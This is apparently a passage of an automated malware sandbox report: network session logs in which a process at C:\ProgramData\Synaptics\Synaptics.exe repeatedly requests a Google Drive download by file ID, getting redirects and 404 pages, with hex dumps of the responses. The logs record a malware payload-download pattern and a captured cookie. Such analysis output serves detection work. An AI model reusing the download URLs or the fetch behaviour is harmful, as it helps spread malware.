                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 33 44 49 62 5f 43 37 78 61 72 6f 46 71 74 4e 47 33 4e 47 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="G3DIb_C7xaroFqtNG3NGBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                75192.168.2.450062142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:39 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6anN6xTThJPNxJh4-oRxnx-Y-LyqS9o3ErQtwk0A3QmlwB-oTqs5JNz6LOhpDonrX-IKEELzw
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-sE3a1WlXghqLlKqVoNJNNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:39 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:39 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 6b 4d 74 52 59 50 42 51 76 4d 5f 44 45 6d 43 34 49 7a 78 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="zkMtRYPBQvM_DEmC4IzxMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:39 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                76192.168.2.450079142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-k0ayyOlD7IQUHkqBChllFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                77192.168.2.450080142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BsdafHBSeQwnaJwpqtIitQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                78192.168.2.450091142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4S99C6FJ_ymN-OcNZ624E2o0fYScXPrcR6RPWd5ZmcfOU43HWcCILwegSf7imVW5lEGKaiW_Y
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:44 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-t9hZTDDEy-CmHqskxMsdsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 34 46 35 4b 79 6d 69 31 49 6f 72 57 6d 52 4a 61 74 5f 50 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="E4F5Kymi1IorWmRJat_PTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                79192.168.2.450089142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:44 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HhkKwrWHxl-2oeibInIdOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                80192.168.2.450090142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:44 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mYaaHM0sLulRzBZcLCKnyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                81192.168.2.450092142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6IUec-h0_uXlTdOm2ngmUhFNFSlJHTMtBegcESr43wOLrnaTa-j2C3NDzxHoPkB6ra4_RXZ_w
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:45 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-9FLXBR3QXg26etNw40Jj-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
